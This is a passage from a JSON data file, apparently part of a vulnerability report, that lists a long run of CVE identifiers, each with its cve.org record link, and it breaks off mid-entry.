"url": "https://www.cve.org/CVERecord?id=CVE-2024-49905"
},
{
"name": "CVE-2023-52831",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52831"
},
{
"name": "CVE-2023-53221",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53221"
},
{
"name": "CVE-2024-26719",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26719"
},
{
"name": "CVE-2022-44034",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-44034"
},
{
"name": "CVE-2022-40897",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40897"
},
{
"name": "CVE-2023-53072",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53072"
},
{
"name": "CVE-2023-2007",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2007"
},
{
"name": "CVE-2022-37341",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-37341"
},
{
"name": "CVE-2025-69648",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69648"
},
{
"name": "CVE-2023-0466",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0466"
},
{
"name": "CVE-2024-50298",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50298"
},
{
"name": "CVE-2025-36424",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36424"
},
{
"name": "CVE-2025-21915",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21915"
},
{
"name": "CVE-2025-38590",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38590"
},
{
"name": "CVE-2024-46843",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46843"
},
{
"name": "CVE-2025-21792",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21792"
},
{
"name": "CVE-2023-54016",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54016"
},
{
"name": "CVE-2025-36387",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36387"
},
{
"name": "CVE-2025-38709",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38709"
},
{
"name": "CVE-2024-58018",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58018"
},
{
"name": "CVE-2023-4408",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4408"
},
{
"name": "CVE-2025-71235",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71235"
},
{
"name": "CVE-2025-61771",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61771"
},
{
"name": "CVE-2023-53602",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53602"
},
{
"name": "CVE-2023-2828",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2828"
},
{
"name": "CVE-2023-54035",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54035"
},
{
"name": "CVE-2025-40322",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40322"
},
{
"name": "CVE-2023-53867",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53867"
},
{
"name": "CVE-2023-0465",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0465"
},
{
"name": "CVE-2025-61770",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61770"
},
{
"name": "CVE-2025-37926",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37926"
},
{
"name": "CVE-2024-46715",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46715"
},
{
"name": "CVE-2025-38038",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38038"
},
{
"name": "CVE-2024-46802",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46802"
},
{
"name": "CVE-2025-39859",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39859"
},
{
"name": "CVE-2025-40313",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40313"
},
{
"name": "CVE-2023-52582",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52582"
},
{
"name": "CVE-2023-33053",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-33053"
},
{
"name": "CVE-2025-1152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1152"
},
{
"name": "CVE-2026-24051",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24051"
},
{
"name": "CVE-2025-38015",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38015"
},
{
"name": "CVE-2024-26742",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26742"
},
{
"name": "CVE-2025-38449",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38449"
},
{
"name": "CVE-2025-21714",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21714"
},
{
"name": "CVE-2025-38261",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38261"
},
{
"name": "CVE-2024-36918",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36918"
},
{
"name": "CVE-2025-37853",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37853"
},
{
"name": "CVE-2025-69644",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69644"
},
{
"name": "CVE-2022-49303",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49303"
},
{
"name": "CVE-2025-38126",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38126"
},
{
"name": "CVE-2023-46809",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-46809"
},
{
"name": "CVE-2025-59465",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59465"
},
{
"name": "CVE-2025-39763",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39763"
},
{
"name": "CVE-2025-21972",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21972"
},
{
"name": "CVE-2023-54088",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54088"
},
{
"name": "CVE-2024-42320",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42320"
},
{
"name": "CVE-2025-38679",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38679"
},
{
"name": "CVE-2025-40271",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40271"
},
{
"name": "CVE-2024-53234",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53234"
},
{
"name": "CVE-2025-11961",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-11961"
},
{
"name": "CVE-2025-39877",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39877"
},
{
"name": "CVE-2022-3114",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3114"
},
{
"name": "CVE-2023-52916",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52916"
},
{
"name": "CVE-2025-38064",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38064"
},
{
"name": "CVE-2026-22991",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22991"
},
{
"name": "CVE-2024-35937",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35937"
},
{
"name": "CVE-2022-50628",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50628"
},
{
"name": "CVE-2024-56718",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56718"
},
{
"name": "CVE-2024-43824",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43824"
},
{
"name": "CVE-2025-39886",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39886"
},
{
"name": "CVE-2022-50350",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50350"
},
{
"name": "CVE-2025-21831",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21831"
},
{
"name": "CVE-2022-50721",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50721"
},
{
"name": "CVE-2022-50095",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50095"
},
{
"name": "CVE-2025-40073",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40073"
},
{
"name": "CVE-2024-26662",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26662"
},
{
"name": "CVE-2026-3196",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-3196"
},
{
"name": "CVE-2025-61662",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61662"
},
{
"name": "CVE-2025-8291",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8291"
},
{
"name": "CVE-2025-68308",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68308"
},
{
"name": "CVE-2024-50217",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50217"
},
{
"name": "CVE-2021-0168",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-0168"
},
{
"name": "CVE-2026-22795",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22795"
},
{
"name": "CVE-2022-50479",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50479"
},
{
"name": "CVE-2022-50583",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50583"
},
{
"name": "CVE-2025-37806",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37806"
},
{
"name": "CVE-2024-38554",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38554"
},
{
"name": "CVE-2025-68822",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68822"
},
{
"name": "CVE-2025-40242",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40242"
},
{
"name": "CVE-2023-0030",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0030"
},
{
"name": "CVE-2024-42110",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42110"
},
{
"name": "CVE-2025-37822",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37822"
},
{
"name": "CVE-2025-61727",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61727"
},
{
"name": "CVE-2025-39838",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39838"
},
{
"name": "CVE-2025-37820",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37820"
},
{
"name": "CVE-2024-53179",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53179"
},
{
"name": "CVE-2024-57945",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57945"
},
{
"name": "CVE-2023-54233",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54233"
},
{
"name": "CVE-2024-43899",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43899"
},
{
"name": "CVE-2025-21986",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21986"
},
{
"name": "CVE-2019-15213",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-15213"
},
{
"name": "CVE-2025-38234",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38234"
},
{
"name": "CVE-2022-49935",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49935"
},
{
"name": "CVE-2021-44532",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44532"
},
{
"name": "CVE-2025-38011",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38011"
},
{
"name": "CVE-2022-49534",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49534"
},
{
"name": "CVE-2024-57974",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57974"
},
{
"name": "CVE-2024-50012",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50012"
},
{
"name": "CVE-2025-68190",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68190"
},
{
"name": "CVE-2023-53010",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53010"
},
{
"name": "CVE-2024-35956",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35956"
},
{
"name": "CVE-2024-57888",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57888"
},
{
"name": "CVE-2025-65637",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-65637"
},
{
"name": "CVE-2024-35908",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35908"
},
{
"name": "CVE-2023-54237",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54237"
},
{
"name": "CVE-2025-37878",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37878"
},
{
"name": "CVE-2023-53424",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53424"
},
{
"name": "CVE-2026-23207",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23207"
},
{
"name": "CVE-2025-40252",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40252"
},
{
"name": "CVE-2022-49134",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49134"
},
{
"name": "CVE-2025-21946",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21946"
},
{
"name": "CVE-2025-21838",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21838"
},
{
"name": "CVE-2022-49333",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49333"
},
{
"name": "CVE-2023-53791",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53791"
},
{
"name": "CVE-2025-27111",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27111"
},
{
"name": "CVE-2024-49994",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49994"
},
{
"name": "CVE-2025-53859",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53859"
},
{
"name": "CVE-2019-19814",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-19814"
},
{
"name": "CVE-2022-49136",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49136"
},
{
"name": "CVE-2025-68255",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68255"
},
{
"name": "CVE-2025-47910",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47910"
},
{
"name": "CVE-2023-54081",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54081"
},
{
"name": "CVE-2024-36898",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36898"
},
{
"name": "CVE-2024-44962",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-44962"
},
{
"name": "CVE-2025-68322",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68322"
},
{
"name": "CVE-2024-35931",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35931"
},
{
"name": "CVE-2025-38702",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38702"
},
{
"name": "CVE-2026-22980",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22980"
},
{
"name": "CVE-2026-23138",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23138"
},
{
"name": "CVE-2025-39927",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39927"
},
{
"name": "CVE-2026-1703",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1703"
},
{
"name": "CVE-2023-26551",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26551"
},
{
"name": "CVE-2024-46857",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46857"
},
{
"name": "CVE-2024-58013",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58013"
},
{
"name": "CVE-2024-53210",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53210"
},
{
"name": "CVE-2023-54185",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54185"
},
{
"name": "CVE-2022-49342",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49342"
},
{
"name": "CVE-2015-8553",
"url": "https://www.cve.org/CVERecord?id=CVE-2015-8553"
},
{
"name": "CVE-2025-40277",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40277"
},
{
"name": "CVE-2025-38250",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38250"
},
{
"name": "CVE-2024-36966",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36966"
},
{
"name": "CVE-2023-53332",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53332"
},
{
"name": "CVE-2024-35924",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35924"
},
{
"name": "CVE-2024-58095",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58095"
},
{
"name": "CVE-2024-45010",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45010"
},
{
"name": "CVE-2022-49471",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49471"
},
{
"name": "CVE-2025-68174",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68174"
},
{
"name": "CVE-2022-48976",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48976"
},
{
"name": "CVE-2025-21751",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21751"
},
{
"name": "CVE-2023-53753",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53753"
},
{
"name": "CVE-2024-41074",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41074"
},
{
"name": "CVE-2026-23234",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23234"
},
{
"name": "CVE-2025-40272",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40272"
},
{
"name": "CVE-2024-50106",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50106"
},
{
"name": "CVE-2025-23162",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23162"
},
{
"name": "CVE-2026-23133",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23133"
},
{
"name": "CVE-2025-71093",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71093"
},
{
"name": "CVE-2025-46727",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-46727"
},
{
"name": "CVE-2017-13694",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-13694"
},
{
"name": "CVE-2025-71102",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71102"
},
{
"name": "CVE-2026-23212",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23212"
},
{
"name": "CVE-2013-7445",
"url": "https://www.cve.org/CVERecord?id=CVE-2013-7445"
},
{
"name": "CVE-2026-23170",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23170"
},
{
"name": "CVE-2023-52701",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52701"
},
{
"name": "CVE-2024-49906",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49906"
},
{
"name": "CVE-2024-26647",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26647"
},
{
"name": "CVE-2025-68759",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68759"
},
{
"name": "CVE-2024-47809",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47809"
},
{
"name": "CVE-2026-23204",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23204"
},
{
"name": "CVE-2022-49317",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49317"
},
{
"name": "CVE-2026-23019",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23019"
},
{
"name": "CVE-2018-12928",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-12928"
},
{
"name": "CVE-2025-71188",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71188"
},
{
"name": "CVE-2023-38552",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38552"
},
{
"name": "CVE-2024-40989",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-40989"
},
{
"name": "CVE-2024-56607",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56607"
},
{
"name": "CVE-2025-40345",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40345"
},
{
"name": "CVE-2026-27142",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27142"
},
{
"name": "CVE-2024-49904",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49904"
},
{
"name": "CVE-2023-53671",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53671"
},
{
"name": "CVE-2025-40354",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40354"
},
{
"name": "CVE-2024-26938",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26938"
},
{
"name": "CVE-2026-28417",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-28417"
},
{
"name": "CVE-2025-37931",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37931"
},
{
"name": "CVE-2024-35999",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35999"
},
{
"name": "CVE-2023-29942",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29942"
},
{
"name": "CVE-2026-23125",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23125"
},
{
"name": "CVE-2026-0966",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-0966"
},
{
"name": "CVE-2022-48633",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48633"
},
{
"name": "CVE-2022-3238",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3238"
},
{
"name": "CVE-2024-38557",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38557"
},
{
"name": "CVE-2026-22185",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22185"
},
{
"name": "CVE-2023-53781",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53781"
},
{
"name": "CVE-2023-53584",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53584"
},
{
"name": "CVE-2024-57809",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57809"
},
{
"name": "CVE-2025-38057",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38057"
},
{
"name": "CVE-2025-68733",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68733"
},
{
"name": "CVE-2024-56719",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56719"
},
{
"name": "CVE-2022-50418",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50418"
},
{
"name": "CVE-2023-53438",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53438"
},
{
"name": "CVE-2025-47906",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47906"
},
{
"name": "CVE-2023-53460",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53460"
},
{
"name": "CVE-2026-23214",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23214"
},
{
"name": "CVE-2024-52559",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52559"
},
{
"name": "CVE-2025-68188",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68188"
},
{
"name": "CVE-2025-40269",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40269"
},
{
"name": "CVE-2024-56671",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56671"
},
{
"name": "CVE-2025-68335",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68335"
},
{
"name": "CVE-2025-71079",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71079"
},
{
"name": "CVE-2025-62626",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62626"
},
{
"name": "CVE-2025-39940",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39940"
},
{
"name": "CVE-2023-52751",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52751"
},
{
"name": "CVE-2022-49562",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49562"
},
{
"name": "CVE-2025-37861",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37861"
},
{
"name": "CVE-2023-53483",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53483"
},
{
"name": "CVE-2023-53673",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53673"
},
{
"name": "CVE-2025-37938",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37938"
},
{
"name": "CVE-2025-37746",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37746"
},
{
"name": "CVE-2022-38076",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-38076"
},
{
"name": "CVE-2025-38368",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38368"
},
{
"name": "CVE-2026-23178",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23178"
},
{
"name": "CVE-2025-59375",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59375"
},
{
"name": "CVE-2025-31133",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-31133"
},
{
"name": "CVE-2026-22997",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22997"
},
{
"name": "CVE-2024-56368",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56368"
},
{
"name": "CVE-2025-40075",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40075"
},
{
"name": "CVE-2022-49172",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49172"
},
{
"name": "CVE-2025-8194",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8194"
},
{
"name": "CVE-2024-40979",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-40979"
},
{
"name": "CVE-2025-39977",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39977"
},
{
"name": "CVE-2025-38331",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38331"
},
{
"name": "CVE-2026-23240",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23240"
},
{
"name": "CVE-2025-68330",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68330"
},
{
"name": "CVE-2026-23228",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23228"
},
{
"name": "CVE-2024-49945",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49945"
},
{
"name": "CVE-2022-44033",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-44033"
},
{
"name": "CVE-2024-56757",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56757"
},
{
"name": "CVE-2023-53662",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53662"
},
{
"name": "CVE-2025-38069",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38069"
},
{
"name": "CVE-2022-49750",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49750"
},
{
"name": "CVE-2023-53707",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53707"
},
{
"name": "CVE-2023-53115",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53115"
},
{
"name": "CVE-2025-71196",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71196"
},
{
"name": "CVE-2025-21645",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21645"
},
{
"name": "CVE-2023-54107",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54107"
},
{
"name": "CVE-2022-48646",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48646"
},
{
"name": "CVE-2024-43912",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43912"
},
{
"name": "CVE-2024-35808",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35808"
},
{
"name": "CVE-2024-58012",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58012"
},
{
"name": "CVE-2025-50181",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50181"
},
{
"name": "CVE-2025-61663",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61663"
},
{
"name": "CVE-2025-68772",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68772"
},
{
"name": "CVE-2024-49891",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49891"
},
{
"name": "CVE-2024-36948",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36948"
},
{
"name": "CVE-2022-48887",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48887"
},
{
"name": "CVE-2024-40977",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-40977"
},
{
"name": "CVE-2024-26948",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26948"
},
{
"name": "CVE-2023-53370",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53370"
},
{
"name": "CVE-2024-53187",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53187"
},
{
"name": "CVE-2023-45929",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45929"
},
{
"name": "CVE-2025-68343",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68343"
},
{
"name": "CVE-2025-66382",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66382"
},
{
"name": "CVE-2024-57795",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57795"
},
{
"name": "CVE-2025-37855",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37855"
},
{
"name": "CVE-2025-21816",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21816"
},
{
"name": "CVE-2021-33115",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-33115"
},
{
"name": "CVE-2025-21780",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21780"
},
{
"name": "CVE-2020-26559",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-26559"
},
{
"name": "CVE-2024-12705",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12705"
},
{
"name": "CVE-2025-69421",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69421"
},
{
"name": "CVE-2020-26140",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-26140"
},
{
"name": "CVE-2024-39508",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39508"
},
{
"name": "CVE-2026-23191",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23191"
},
{
"name": "CVE-2026-32249",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-32249"
},
{
"name": "CVE-2025-37899",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37899"
},
{
"name": "CVE-2026-23078",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23078"
},
{
"name": "CVE-2025-40362",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40362"
},
{
"name": "CVE-2025-68201",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68201"
},
{
"name": "CVE-2024-43831",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43831"
},
{
"name": "CVE-2023-30630",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-30630"
},
{
"name": "CVE-2025-40289",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40289"
},
{
"name": "CVE-2026-23169",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23169"
},
{
"name": "CVE-2025-38330",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38330"
},
{
"name": "CVE-2025-58188",
